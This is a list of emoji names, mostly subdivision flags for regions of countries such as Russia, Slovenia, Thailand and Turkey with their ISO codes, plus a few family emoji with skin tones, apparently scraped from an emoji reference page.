🏴 Flag for Mari El (RU-ME)
🏴 Flag for Chukotka Okrug (RU-CHU)
🏴 Flag for Kaliningrad (RU-KGD)
🏴 Flag for Irkutsk (RU-IRK)
🏴 Flag for Kaluga (RU-KLU)
🏴 Flag for Kabardino-Balkar (RU-KB)
🏴 Flag for Lipetsk (RU-LIP)
🏴 Flag for Bashkortostan (RU-BA)
🏴 Flag for Chuvash (RU-CU)
🏴 Flag for Kamchatka Krai (RU-KAM)
🏴 Flag for Kostroma (RU-KOS)
🏴 Flag for Sakhalin (RU-SAK)
🏴 Flag for Tver (RU-TVE)
🏴 Flag for Novosibirsk (RU-NVS)
🏴 Flag for Vladimir (RU-VLA)
🏴 Flag for Oryol (RU-ORL)
🏴 Flag for Stavropol Krai (RU-STA)
🏴 Flag for Nizhny Novgorod (RU-NIZ)
🏴 Flag for Saratov (RU-SAR)
🏴 Flag for Orenburg (RU-ORE)
🏴 Flag for Nenets (RU-NEN)
🏴 Flag for Volgograd (RU-VGG)
🏴 Flag for Tomsk (RU-TOM)
🏴 Flag for Sverdlovsk (RU-SVE)
🏴 Flag for Saint Petersburg (RU-SPE)
🏴 Flag for Yamalo-Nenets Okrug (RU-YAN)
🏴 Flag for Sakha (RU-SA)
🏴 Flag for Moscow (RU-MOW)
🏴 Flag for Penza (RU-PNZ)
🏴 Flag for Smolensk (RU-SMO)
🏴 Flag for Tatarstan (RU-TA)
🏴 Flag for Vologda (RU-VLG)
🏴 Flag for Tula (RU-TUL)
🏴 Flag for Yaroslavl (RU-YAR)
🏴 Flag for Tyumen (RU-TYU)
🏴 Flag for Pskov (RU-PSK)
🏴 Flag for Udmurt (RU-UD)
🏴 Flag for Samara (RU-SAM)
🏴 Flag for Ulyanovsk (RU-ULY)
🏴 Flag for Ryazan (RU-RYA)
🏴 Flag for Omsk (RU-OMS)
🏴 Flag for Perm Krai (RU-PER)
🏴 Flag for Voronezh (RU-VOR)
🏴 Flag for Novgorod (RU-NGR)
🏴 Flag for Tambov (RU-TAM)
🏴 Flag for Tuva (RU-TY)
🏴 Flag for Rostov (RU-ROS)
🏴 Flag for Murmansk (RU-MUR)
🏴 Flag for Kigali (RW-01)
🏴 Flag for Anse Etoile (SC-03)
🏴 Flag for Isabel (SB-IS)
🏴 Flag for Anse Boileau (SC-02)
🏴 Flag for Tabuk (SA-07)
🏴 Flag for Guadalcanal (SB-GU)
🏴 Flag for Northern (RW-03)
🏴 Flag for Southern (RW-05)
🏴 Flag for Central (SB-CE)
🏴 Flag for Ha’il (SA-06)
🏴 Flag for Bel Air (SC-09)
🏴 Flag for Malaita (SB-ML)
🏴 Flag for Najran (SA-10)
🏴 Flag for Al Jawf (SA-12)
🏴 Flag for Honiara (SB-CT)
🏴 Flag for Western (SB-WE)
🏴 Flag for Northern Borders (SA-08)
🏴 Flag for Riyadh (SA-01)
🏴 Flag for Rennell and Bellona (SB-RB)
🏴 Flag for Au Cap (SC-04)
🏴 Flag for Eastern (RW-02)
🏴 Flag for Anse Royale (SC-05)
🏴 Flag for Jewish (RU-YEV)
🏴 Flag for Bel Ombre (SC-10)
🏴 Flag for Al-Qassim (SA-05)
🏴 Flag for Temotu (SB-TE)
🏴 Flag for Baie Sainte Anne (SC-07)
🏴 Flag for Choiseul (SB-CH)
🏴 Flag for Western (RW-04)
🏴 Flag for Makira-Ulawa (SB-MK)
🏴 Flag for Makkah (SA-02)
🏴 Flag for Jizan (SA-09)
🏴 Flag for Anse aux Pins (SC-01)
🏴 Flag for Eastern (SA-04)
🏴 Flag for Asir (SA-14)
🏴 Flag for Zabaykalsky Krai (RU-ZAB)
🏴 Flag for Beau Vallon (SC-08)
🏴 Flag for Al Madinah (SA-03)
🏴 Flag for Baie Lazare (SC-06)
🏴 Flag for Plaisance (SC-19)
🏴 Flag for Södermanland (SE-D)
🏴 Flag for La Rivière Anglaise (SC-16)
🏴 Flag for Saint Louis (SC-22)
🏴 Flag for Mont Fleuri (SC-18)
🏴 Flag for Northern (SD-NO)
🏴 Flag for Grand’Anse Mahé (SC-13)
🏴 Flag for Takamaka (SC-23)
🏴 Flag for West Darfur (SD-DW)
🏴 Flag for Al Qadarif (SD-GD)
🏴 Flag for South Darfur (SD-DS)
🏴 Flag for River Nile (SD-NR)
🏴 Flag for West Kurdufan (SD-GK)
🏴 Flag for Kassala (SD-KA)
🏴 Flag for Khartoum (SD-KH)
🏴 Flag for La Digue (SC-15)
🏴 Flag for Les Mamelles (SC-24)
🏴 Flag for Port Glaud (SC-21)
🏴 Flag for Västerbotten (SE-AC)
🏴 Flag for Jönköping (SE-F)
🏴 Flag for Stockholm (SE-AB)
🏴 Flag for Glacis (SC-12)
🏴 Flag for Pointe La Rue (SC-20)
🏴 Flag for White Nile (SD-NW)
🏴 Flag for Al Jazirah (SD-GZ)
🏴 Flag for Östergötland (SE-E)
🏴 Flag for Norrbotten (SE-BD)
🏴 Flag for Uppsala (SE-C)
🏴 Flag for Mont Buxton (SC-17)
🏴 Flag for Grand’Anse Praslin (SC-14)
🏴 Flag for South Kurdufan (SD-KS)
🏴 Flag for Cascade (SC-11)
🏴 Flag for North Kurdufan (SD-KN)
🏴 Flag for Sennar (SD-SI)
🏴 Flag for East Darfur (SD-DE)
🏴 Flag for Blue Nile (SD-NB)
🏴 Flag for North Darfur (SD-DN)
🏴 Flag for Central Darfur (SD-DC)
🏴 Flag for Västmanland (SE-U)
🏴 Flag for Värmland (SE-S)
🏴 Flag for Črnomelj (SI-017)
🏴 Flag for Västernorrland (SE-Y)
🏴 Flag for South West (SG-05)
🏴 Flag for Črna na Koroškem (SI-016)
🏴 Flag for Västra Götaland (SE-O)
🏴 Flag for Gävleborg (SE-X)
🏴 Flag for North East (SG-02)
🏴 Flag for Brda (SI-007)
🏴 Flag for Kalmar (SE-H)
🏴 Flag for Destrnik (SI-018)
🏴 Flag for Beltinci (SI-002)
🏴 Flag for Bohinj (SI-004)
🏴 Flag for Brežice (SI-009)
🏴 Flag for North West (SG-03)
🏴 Flag for Ascension Island (SH-AC)
👩🏽👦🏽👶🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Cerklje na Gorenjskem (SI-012)
🏴 Flag for Cerknica (SI-013)
🏴 Flag for Bovec (SI-006)
🏴 Flag for Črenšovci (SI-015)
🏴 Flag for Kronoberg (SE-G)
🏴 Flag for Ajdovščina (SI-001)
🏴 Flag for Tišina (SI-010)
🏴 Flag for South East (SG-04)
🏴 Flag for Brezovica (SI-008)
🏴 Flag for Saint Helena (SH-HL)
🏴 Flag for Jämtland (SE-Z)
🏴 Flag for Gotland (SE-I)
🏴 Flag for Dalarna (SE-W)
🏴 Flag for Blekinge (SE-K)
🏴 Flag for Borovnica (SI-005)
🏴 Flag for Tristan da Cunha (SH-TA)
🏴 Flag for Bled (SI-003)
🏴 Flag for Cerkno (SI-014)
🏴 Flag for Örebro (SE-T)
🏴 Flag for Domžale (SI-023)
🏴 Flag for Izola (SI-040)
🏴 Flag for Kuzma (SI-056)
🏴 Flag for Dravograd (SI-025)
🏴 Flag for Duplek (SI-026)
🏴 Flag for Jesenice (SI-041)
🏴 Flag for Gorišnica (SI-028)
🏴 Flag for Gornja Radgona (SI-029)
🏴 Flag for Dobrepolje (SI-020)
🏴 Flag for Gornji Petrovci (SI-031)
🏴 Flag for Dornava (SI-024)
🏴 Flag for Hrastnik (SI-034)
🏴 Flag for Ivančna Gorica (SI-039)
🏴 Flag for Komen (SI-049)
🏴 Flag for Kozje (SI-051)
🏴 Flag for Divača (SI-019)
🏴 Flag for Idrija (SI-036)
🏴 Flag for Kidričevo (SI-045)
🏴 Flag for Kobarid (SI-046)
🏴 Flag for Kobilje (SI-047)
🏴 Flag for Koper (SI-050)
🏴 Flag for Ig (SI-037)
🏴 Flag for Kungota (SI-055)
🏴 Flag for Grosuplje (SI-032)
🏴 Flag for Dobrova–Polhov Gradec (SI-021)
🏴 Flag for Juršinci (SI-042)
🏴 Flag for Krško (SI-054)
🏴 Flag for Šalovci (SI-033)
🏴 Flag for Kranjska Gora (SI-053)
🏴 Flag for Kočevje (SI-048)
🏴 Flag for Ilirska Bistrica (SI-038)
🏴 Flag for Kamnik (SI-043)
🏴 Flag for Hrpelje–Kozina (SI-035)
🏴 Flag for Gornji Grad (SI-030)
🏴 Flag for Kanal (SI-044)
🏴 Flag for Dol pri Ljubljani (SI-022)
🏴 Flag for Pesnica (SI-089)
🏴 Flag for Piran (SI-090)
🏴 Flag for Mežica (SI-074)
🏴 Flag for Muta (SI-081)
🏴 Flag for Ljubno (SI-062)
🏴 Flag for Ormož (SI-087)
🏴 Flag for Postojna (SI-094)
🏴 Flag for Mislinja (SI-076)
👩🏾👦🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Majšperk (SI-069)
🏴 Flag for Mengeš (SI-072)
🏴 Flag for Metlika (SI-073)
🏴 Flag for Moravče (SI-077)
🏴 Flag for Moravske Toplice (SI-078)
🏴 Flag for Ljubljana (SI-061)
🏴 Flag for Murska Sobota (SI-080)
🏴 Flag for Naklo (SI-082)
🏴 Flag for Nova Gorica (SI-084)
🏴 Flag for Osilnica (SI-088)
🏴 Flag for Pivka (SI-091)
🏴 Flag for Nazarje (SI-083)
🏴 Flag for Miren–Kostanjevica (SI-075)
🏴 Flag for Logatec (SI-064)
🏴 Flag for Litija (SI-060)
🏴 Flag for Maribor (SI-070)
🏴 Flag for Ljutomer (SI-063)
🏴 Flag for Loški Potok (SI-066)
🏴 Flag for Luče (SI-067)
🏴 Flag for Podčetrtek (SI-092)
🏴 Flag for Podvelka (SI-093)
🏴 Flag for Medvode (SI-071)
🏴 Flag for Loška Dolina (SI-065)
🏴 Flag for Laško (SI-057)
🏴 Flag for Lendava (SI-059)
🏴 Flag for Mozirje (SI-079)
🏴 Flag for Lukovica (SI-068)
🏴 Flag for Tržič (SI-131)
🏴 Flag for Šentilj (SI-118)
🏴 Flag for Rače–Fram (SI-098)
🏴 Flag for Puconci (SI-097)
👩🏿👦🏿👶🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Rogašovci (SI-105)
🏴 Flag for Slovenska Bistrica (SI-113)
🏴 Flag for Rogatec (SI-107)
🏴 Flag for Ptuj (SI-096)
🏴 Flag for Šentjernej (SI-119)
🏴 Flag for Sežana (SI-111)
🏴 Flag for Škofljica (SI-123)
🏴 Flag for Slovenj Gradec (SI-112)
🏴 Flag for Starše (SI-115)
🏴 Flag for Sveti Jurij (SI-116)
🏴 Flag for Trebnje (SI-130)
🏴 Flag for Sevnica (SI-110)
🏴 Flag for Radeče (SI-099)
🏴 Flag for Škocjan (SI-121)
🏴 Flag for Šmarje pri Jelšah (SI-124)
🏴 Flag for Šoštanj (SI-126)
🏴 Flag for Štore (SI-127)
🏴 Flag for Rogaška Slatina (SI-106)
🏴 Flag for Preddvor (SI-095)
🏴 Flag for Turnišče (SI-132)
🏴 Flag for Radovljica (SI-102)
🏴 Flag for Ruše (SI-108)
🏴 Flag for Slovenske Konjice (SI-114)
🏴 Flag for Šentjur (SI-120)
🏴 Flag for Tolmin (SI-128)
🏴 Flag for Ribnica (SI-104)
🏴 Flag for Radlje ob Dravi (SI-101)
🏴 Flag for Trbovlje (SI-129)
🏴 Flag for Semič (SI-109)
🏴 Flag for Šenčur (SI-117)
🏴 Flag for Ravne na Koroškem (SI-103)
🏴 Flag for Miklavž na Dravskem Polju (SI-169)
🏴 Flag for Vodice (SI-138)
🏴 Flag for Velenje (SI-133)
🏴 Flag for Zagorje ob Savi (SI-142)
🏴 Flag for Vuzenica (SI-141)
🏴 Flag for Vrhnika (SI-140)
👩🏻👧🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Železniki (SI-146)
🏴 Flag for Žiri (SI-147)
🏴 Flag for Benedikt (SI-148)
🏴 Flag for Velike Lašče (SI-134)
🏴 Flag for Vitanje (SI-137)
🏴 Flag for Komenda (SI-164)
🏴 Flag for Dobrna (SI-155)
🏴 Flag for Dobrovnik (SI-156)
🏴 Flag for Dolenjske Toplice (SI-157)
🏴 Flag for Hajdina (SI-159)
🏴 Flag for Oplotnica (SI-171)
🏴 Flag for Videm (SI-135)
🏴 Flag for Jezersko (SI-163)
🏴 Flag for Cankova (SI-152)
🏴 Flag for Kostel (SI-165)
🏴 Flag for Križevci (SI-166)
🏴 Flag for Vojnik (SI-139)
🏴 Flag for Markovci (SI-168)
🏴 Flag for Mirna Peč (SI-170)
🏴 Flag for Vipava (SI-136)
🏴 Flag for Horjul (SI-162)
🏴 Flag for Cerkvenjak (SI-153)
🏴 Flag for Bloke (SI-150)
🏴 Flag for Zavrč (SI-143)
🏴 Flag for Bistrica ob Sotli (SI-149)
🏴 Flag for Zreče (SI-144)
🏴 Flag for Hodoš (SI-161)
🏴 Flag for Hoče–Slivnica (SI-160)
🏴 Flag for Grad (SI-158)
🏴 Flag for Podlehnik (SI-172)
🏴 Flag for Cirkulane (SI-196)
🏴 Flag for Prebold (SI-174)
🏴 Flag for Razkrižje (SI-176)
🏴 Flag for Veržej (SI-188)
🏴 Flag for Žalec (SI-190)
🏴 Flag for Solčava (SI-180)
🏴 Flag for Sveta Ana (SI-181)
🏴 Flag for Šempeter–Vrtojba (SI-183)
🏴 Flag for Trnovska Vas (SI-185)
🏴 Flag for Sodražica (SI-179)
🏴 Flag for Makole (SI-198)
🏴 Flag for Straža (SI-203)
🏴 Flag for Selnica ob Dravi (SI-178)
🏴 Flag for Žužemberk (SI-193)
🏴 Flag for Kostanjevica na Krki (SI-197)
🏴 Flag for Prevalje (SI-175)
🏴 Flag for Šmartno pri Litiji (SI-194)
🏴 Flag for Žetale (SI-191)
🏴 Flag for Vransko (SI-189)
🏴 Flag for Renče–Vogrsko (SI-201)
🏴 Flag for Središče ob Dravi (SI-202)
🏴 Flag for Trzin (SI-186)
🏴 Flag for Sveta Trojica v Slovenskih Goricah (SI-204)
🏴 Flag for Sveti Tomaž (SI-205)
🏴 Flag for Ribnica na Pohorju (SI-177)
🏴 Flag for Gorje (SI-207)
🏴 Flag for Tabor (SI-184)
🏴 Flag for Mokronog–Trebelno (SI-199)
🏴 Flag for Polzela (SI-173)
🏴 Flag for Poljčane (SI-200)
🏴 Flag for Apače (SI-195)
🏴 Flag for Velika Polana (SI-187)
🏴 Flag for Trnava (SK-TA)
🏴 Flag for Rečica ob Savinji (SI-209)
🏴 Flag for Serravalle (SM-09)
🏴 Flag for Chiesanuova (SM-02)
🏴 Flag for Kaffrine (SN-KA)
🏴 Flag for Nitra (SK-NI)
🏴 Flag for Šentrupert (SI-211)
🏴 Flag for Borgo Maggiore (SM-06)
🏴 Flag for Košice (SK-KI)
🏴 Flag for Banská Bystrica (SK-BC)
🏴 Flag for Montegiardino (SM-08)
🏴 Flag for Dakar (SN-DK)
🏴 Flag for Prešov (SK-PV)
🏴 Flag for Mirna (SI-212)
🏴 Flag for Fiorentino (SM-05)
🏴 Flag for Thiès (SN-TH)
🏴 Flag for Ankaran (SI-213)
🏴 Flag for Tambacounda (SN-TC)
🏴 Flag for Fatick (SN-FK)
🏴 Flag for Trenčín (SK-TC)
🏴 Flag for Kaolack (SN-KL)
🏴 Flag for Faetano (SM-04)
🏴 Flag for Žilina (SK-ZI)
🏴 Flag for Southern (SL-S)
🏴 Flag for Sédhiou (SN-SE)
🏴 Flag for Bratislava (SK-BL)
🏴 Flag for Diourbel (SN-DB)
🏴 Flag for Kédougou (SN-KE)
🏴 Flag for Northern (SL-N)
🏴 Flag for Western Area (SL-W)
🏴 Flag for Matam (SN-MT)
🏴 Flag for Eastern (SL-E)
🏴 Flag for Acquaviva (SM-01)
🏴 Flag for Kolda (SN-KD)
🏴 Flag for Saint-Louis (SN-SL)
🏴 Flag for San Marino (SM-07)
🏴 Flag for Louga (SN-LG)
🏴 Flag for Domagnano (SM-03)
🏴 Flag for Eastern Equatoria (SS-EE)
🏴 Flag for Saramacca (SR-SA)
👩🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Marowijne (SR-MA)
🏴 Flag for Middle Juba (SO-JD)
🏴 Flag for Mudug (SO-MU)
🏴 Flag for Lower Shebelle (SO-SH)
🏴 Flag for Hiran (SO-HI)
🏴 Flag for Central Equatoria (SS-EC)
🏴 Flag for Ziguinchor (SN-ZG)
🏴 Flag for Coronie (SR-CR)
🏴 Flag for Middle Shebelle (SO-SD)
🏴 Flag for Upper Nile (SS-NU)
🏴 Flag for Wanica (SR-WA)
🏴 Flag for Awdal (SO-AW)
🏴 Flag for Sanaag (SO-SA)
🏴 Flag for Lower Juba (SO-JH)
🏴 Flag for Lakes (SS-LK)
🏴 Flag for Warrap (SS-WR)
🏴 Flag for Príncipe (ST-P)
🏴 Flag for Sipaliwini (SR-SI)
🏴 Flag for Western Bahr el Ghazal (SS-BW)
🏴 Flag for Western Equatoria (SS-EW)
🏴 Flag for Bari (SO-BR)
🏴 Flag for Jonglei (SS-JG)
🏴 Flag for Paramaribo (SR-PM)
🏴 Flag for Commewijne (SR-CM)
🏴 Flag for Galguduud (SO-GA)
🏴 Flag for Nickerie (SR-NI)
🏴 Flag for Para (SR-PR)
🏴 Flag for Woqooyi Galbeed (SO-WO)
🏴 Flag for Gedo (SO-GE)
🏴 Flag for Bay, Somalia (SO-BY)
🏴 Flag for Brokopondo (SR-BR)
🏴 Flag for Nugal (SO-NU)
🏴 Flag for Togdheer (SO-TO)
🏴 Flag for Bakool (SO-BK)
🏴 Flag for Sool (SO-SO)
🏴 Flag for Hhohho (SZ-HH)
🏴 Flag for Ennedi-Ouest (TD-EO)
🏴 Flag for Guéra (TD-GR)
🏴 Flag for Shiselweni (SZ-SH)
🏴 Flag for Daraa (SY-DR)
🏴 Flag for Ar-Raqqah (SY-RA)
🏴 Flag for Sonsonate (SV-SO)
🏴 Flag for La Unión (SV-UN)
🏴 Flag for San Miguel (SV-SM)
🏴 Flag for Morazán (SV-MO)
🏴 Flag for San Salvador (SV-SS)
🏴 Flag for Deir ez-Zor (SY-DY)
🏴 Flag for Cabañas (SV-CA)
🏴 Flag for Lubombo (SZ-LU)
🏴 Flag for Chalatenango (SV-CH)
🏴 Flag for Rif Dimashq (SY-RD)
🏴 Flag for Tartus (SY-TA)
🏴 Flag for Borkou (TD-BO)
🏴 Flag for Manzini (SZ-MA)
🏴 Flag for Batha (TD-BA)
🏴 Flag for Homs (SY-HI)
🏴 Flag for Ennedi-Est (TD-EE)
🏴 Flag for Bahr el Gazel (TD-BG)
🏴 Flag for Kanem (TD-KA)
🏴 Flag for Hama (SY-HM)
🏴 Flag for Latakia (SY-LA)
🏴 Flag for Idlib (SY-ID)
🏴 Flag for La Libertad (SV-LI)
🏴 Flag for Aleppo (SY-HL)
🏴 Flag for Ahuachapán (SV-AH)
🏴 Flag for Chari-Baguirmi (TD-CB)
🏴 Flag for La Paz (SV-PA)
🏴 Flag for As-Suwayda (SY-SU)
🏴 Flag for Damascus (SY-DI)
🏴 Flag for Quneitra (SY-QU)
🏴 Flag for Al-Hasakah (SY-HA)
🏴 Flag for Santa Ana (SV-SA)
🏴 Flag for Cuscatlán (SV-CU)
🏴 Flag for Logone Occidental (TD-LO)
🏴 Flag for Chanthaburi (TH-22)
🏴 Flag for Mayo-Kebbi Est (TD-ME)
🏴 Flag for Moyen-Chari (TD-MC)
🏴 Flag for Logone Oriental (TD-LR)
🏴 Flag for Savanes (TG-S)
🏴 Flag for Phra Nakhon Si Ayutthaya (TH-14)
🏴 Flag for Centrale (TG-C)
🏴 Flag for Sa Kaeo (TH-27)
🏴 Flag for Nonthaburi (TH-12)
🏴 Flag for Buri Ram (TH-31)
🏴 Flag for Chon Buri (TH-20)
🏴 Flag for Sila (TD-SI)
🏴 Flag for Lac (TD-LC)
🏴 Flag for Rayong (TH-21)
🏴 Flag for Prachin Buri (TH-25)
🏴 Flag for Nakhon Ratchasima (TH-30)
🏴 Flag for Kara (TG-K)
🏴 Flag for Ang Thong (TH-15)
🏴 Flag for Bangkok (TH-10)
🏴 Flag for Mandoul (TD-MA)
🏴 Flag for Pathum Thani (TH-13)
🏴 Flag for Chachoengsao (TH-24)
🏴 Flag for Sing Buri (TH-17)
🏴 Flag for Mayo-Kebbi Ouest (TD-MO)
🏴 Flag for Ouaddaï (TD-OD)
🏴 Flag for Surin (TH-32)
🏴 Flag for Nakhon Nayok (TH-26)
🏴 Flag for Salamat (TD-SA)
🏴 Flag for Tandjilé (TD-TA)
🏴 Flag for Wadi Fira (TD-WF)
🏴 Flag for Saraburi (TH-19)
🏴 Flag for Samut Prakan (TH-11)
🏴 Flag for Tibesti (TD-TI)
🏴 Flag for Plateaux (TG-P)
🏴 Flag for N’Djamena (TD-ND)
🏴 Flag for Chai Nat (TH-18)
🏴 Flag for Kamphaeng Phet (TH-62)
🏴 Flag for Suphanburi (TH-72)
🏴 Flag for Samut Sakhon (TH-74)
🏴 Flag for Phetchabun (TH-67)
🏴 Flag for Kanchanaburi (TH-71)
🏴 Flag for Phrae (TH-54)
🏴 Flag for Tak (TH-63)
🏴 Flag for Nakhon Phanom (TH-48)
🏴 Flag for Lampang (TH-52)
🏴 Flag for Mae Hong Son (TH-58)
🏴 Flag for Sakon Nakhon (TH-47)
🏴 Flag for Phayao (TH-56)
🏴 Flag for Udon Thani (TH-41)
🏴 Flag for Mukdahan (TH-49)
🏴 Flag for Nakhon Pathom (TH-73)
🏴 Flag for Chiang Mai (TH-50)
🏴 Flag for Khon Kaen (TH-40)
🏴 Flag for Amnat Charoen (TH-37)
🏴 Flag for Ratchaburi (TH-70)
🏴 Flag for Yasothon (TH-35)
🏴 Flag for Lamphun (TH-51)
🏴 Flag for Loei (TH-42)
🏴 Flag for Nakhon Sawan (TH-60)
🏴 Flag for Ubon Ratchathani (TH-34)
🏴 Flag for Maha Sarakham (TH-44)
🏴 Flag for Roi Et (TH-45)
🏴 Flag for Kalasin (TH-46)
🏴 Flag for Phichit (TH-66)
🏴 Flag for Nan (TH-55)
🏴 Flag for Uthai Thani (TH-61)
🏴 Flag for Bueng Kan (TH-38)
🏴 Flag for Si Sa Ket (TH-33)
🏴 Flag for Nong Bua Lam Phu (TH-39)
🏴 Flag for Uttaradit (TH-53)
🏴 Flag for Chiang Rai (TH-57)
🏴 Flag for Sukhothai (TH-64)
🏴 Flag for Nong Khai (TH-43)
🏴 Flag for Phitsanulok (TH-65)
🏴 Flag for Ermera (TL-ER)
🏴 Flag for Oecusse (TL-OE)
🏴 Flag for Liquiçá (TL-LI)
🏴 Flag for Aileu (TL-AL)
🏴 Flag for Ahal (TM-A)
🏴 Flag for Surat Thani (TH-84)
🏴 Flag for Phetchaburi (TH-76)
🏴 Flag for Bobonaro (TL-BO)
🏴 Flag for Manatuto (TL-MT)
🏴 Flag for Khatlon (TJ-KT)
🏴 Flag for Ainaro (TL-AN)
🏴 Flag for Phang Nga (TH-82)
🏴 Flag for Cova Lima (TL-CO)
🏴 Flag for Tunis (TN-11)
🏴 Flag for Ranong (TH-85)
🏴 Flag for Nakhon Si Thammarat (TH-80)
🏴 Flag for Prachuap Khiri Khan (TH-77)
🏴 Flag for Dushanbe (TJ-DU)
🏴 Flag for Yala (TH-95)
🏴 Flag for Songkhla (TH-90)
🏴 Flag for Lebap (TM-L)
🏴 Flag for Narathiwat (TH-96)
🏴 Flag for Mary (TM-M)
🏴 Flag for Manufahi (TL-MF)
👨🏼👨🏼👦🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Balkan (TM-B)
🏴 Flag for Baucau (TL-BA)
🏴 Flag for Nohiyahoi Tobei Jumhurí (TJ-RA)
🏴 Flag for Trang (TH-92)
🏴 Flag for Sughd (TJ-SU)
🏴 Flag for Viqueque (TL-VI)
🏴 Flag for Pattani (TH-94)
🏴 Flag for Krabi (TH-81)
🏴 Flag for Dili (TL-DI)
🏴 Flag for Phuket (TH-83)
🏴 Flag for Satun (TH-91)
🏴 Flag for Pattaya (TH-S)
🏴 Flag for Daşoguz (TM-D)
🏴 Flag for Kairouan (TN-41)
🏴 Flag for Monastir (TN-52)
🏴 Flag for Aydın (TR-09)
🏴 Flag for Béja (TN-31)
🏴 Flag for Antalya (TR-07)
🏴 Flag for Nabeul (TN-21)
🏴 Flag for Mahdia (TN-53)
🏴 Flag for Haʻapai (TO-02)
🏴 Flag for Amasya (TR-05)
🏴 Flag for Bitlis (TR-13)
🏴 Flag for Ariana (TN-12)
🏴 Flag for Kebili (TN-73)
🏴 Flag for Adana (TR-01)
🏴 Flag for ʻEua (TO-01)
🏴 Flag for Bingöl (TR-12)
🏴 Flag for Tataouine (TN-83)
🏴 Flag for Artvin (TR-08)
🏴 Flag for Sousse (TN-51)
🏴 Flag for Gabès (TN-81)
🏴 Flag for Ağrı (TR-04)
🏴 Flag for Bilecik (TR-11)
🏴 Flag for Jendouba (TN-32)
🏴 Flag for Tongatapu (TO-04)
🏴 Flag for Adıyaman (TR-02)
🏴 Flag for Kef (TN-33)
🏴 Flag for Zaghouan (TN-22)
🏴 Flag for Balıkesir (TR-10)
🏴 Flag for Ben Arous (TN-13)
🏴 Flag for Niuas (TO-03)
🏴 Flag for Tozeur (TN-72)
🏴 Flag for Manouba (TN-14)
🏴 Flag for Kasserine (TN-42)
🏴 Flag for Bolu (TR-14)
🏴 Flag for Siliana (TN-34)
🏴 Flag for Vavaʻu (TO-05)
🏴 Flag for Ankara (TR-06)
🏴 Flag for Sfax (TN-61)
🏴 Flag for Sidi Bouzid (TN-43)
🏴 Flag for Medenine (TN-82)
🏴 Flag for Bizerte (TN-23)
🏴 Flag for Erzincan (TR-24)
🏴 Flag for Kahramanmaraş (TR-46)
🏴 Flag for Kars (TR-36)
🏴 Flag for Niğde (TR-51)
🏴 Flag for Kayseri (TR-38)
🏴 Flag for Kocaeli (TR-41)
🏴 Flag for Çankırı (TR-18)
🏴 Flag for Muğla (TR-48)
🏴 Flag for Konya (TR-42)
🏴 Flag for Malatya (TR-44)
🏴 Flag for Gümüşhane (TR-29)
🏴 Flag for Edirne (TR-22)
🏴 Flag for Kırklareli (TR-39)
🏴 Flag for Gaziantep (TR-27)
🏴 Flag for Samsun (TR-55)
🏴 Flag for Diyarbakır (TR-21)
🏴 Flag for Bursa (TR-16)
🏴 Flag for Çorum (TR-19)
🏴 Flag for Ordu (TR-52)
🏴 Flag for Manisa (TR-45)
🏴 Flag for Erzurum (TR-25)
🏴 Flag for Burdur (TR-15)
🏴 Flag for Isparta (TR-32)
🏴 Flag for Istanbul (TR-34)
🏴 Flag for Hakkâri (TR-30)
🏴 Flag for Hatay (TR-31)
🏴 Flag for Muş (TR-49)
🏴 Flag for Mersin (TR-33)
🏴 Flag for Siirt (TR-56)
🏴 Flag for Nevşehir (TR-50)
🏴 Flag for Elazığ (TR-23)
🏴 Flag for Giresun (TR-28)
🏴 Flag for Denizli (TR-20)
🏴 Flag for Mardin (TR-47)
🏴 Flag for Kastamonu (TR-37)
🏴 Flag for Sakarya (TR-54)
🏴 Flag for Kırşehir (TR-40)
🏴 Flag for Çanakkale (TR-17)
🏴 Flag for Rize (TR-53)
🏴 Flag for Eskişehir (TR-26)
🏴 Flag for Van (TR-65)
🏴 Flag for Princes Town (TT-PRT)
🏴 Flag for Couva-Tabaquite-Talparo (TT-CTT)
🏴 Flag for Tobago (TT-TOB)
🏴 Flag for Şanlıurfa (TR-63)
🏴 Flag for Arima (TT-ARI)
🏴 Flag for Zonguldak (TR-67)
🏴 Flag for Siparia (TT-SIP)
🏴 Flag for Ardahan (TR-75)
🏴 Flag for Kilis (TR-79)
🏴 Flag for Port of Spain (TT-POS)
🏴 Flag for Aksaray (TR-68)
🏴 Flag for Diego Martin (TT-DMN)
🏴 Flag for Bayburt (TR-69)
🏴 Flag for Tekirdağ (TR-59)
🏴 Flag for Batman (TR-72)
🏴 Flag for Chaguanas (TT-CHA)
🏴 Flag for Osmaniye (TR-80)
🏴 Flag for Yalova (TR-77)
🏴 Flag for San Juan-Laventille (TT-SJL)
🏴 Flag for Karabük (TR-78)
🏴 Flag for Yozgat (TR-66)
🏴 Flag for Mayaro-Rio Claro (TT-MRC)
🏴 Flag for Uşak (TR-64)
🏴 Flag for Sinop (TR-57)
🏴 Flag for Tunapuna-Piarco (TT-TUP)
🏴 Flag for Bartın (TR-74)
🏴 Flag for Kırıkkale (TR-71)
🏴 Flag for Penal-Debe (TT-PED)
🏴 Flag for Iğdır (TR-76)
🏴 Flag for Şırnak (TR-73)
🏴 Flag for Trabzon (TR-61)
🏴 Flag for Point Fortin (TT-PTF)
🏴 Flag for Tunceli (TR-62)
🏴 Flag for Tokat (TR-60)
🏴 Flag for Karaman (TR-70)
🏴 Flag for San Fernando (TT-SFO)
🏴 Flag for Sivas (TR-58)
🏴 Flag for Zanzibar North (TZ-07)
🏴 Flag for Changhua (TW-CHA)
🏴 Flag for Vaitupu (TV-VAI)
🏴 Flag for Kaohsiung (TW-KHH)
🏴 Flag for Kilimanjaro (TZ-09)
🏴 Flag for Kinmen (TW-KIN)
🏴 Flag for Penghu (TW-PEN)
🏴 Flag for Tainan (TW-TNN)
🏴 Flag for Nukufetau (TV-NKF)
🏴 Flag for Kigoma (TZ-08)
🏴 Flag for Taipei (TW-TPE)
🏴 Flag for Pingtung (TW-PIF)
🏴 Flag for Yilan (TW-ILA)
🏴 Flag for Taoyuan (TW-TAO)
🏴 Flag for Dodoma (TZ-03)
🏴 Flag for Nui (TV-NUI)
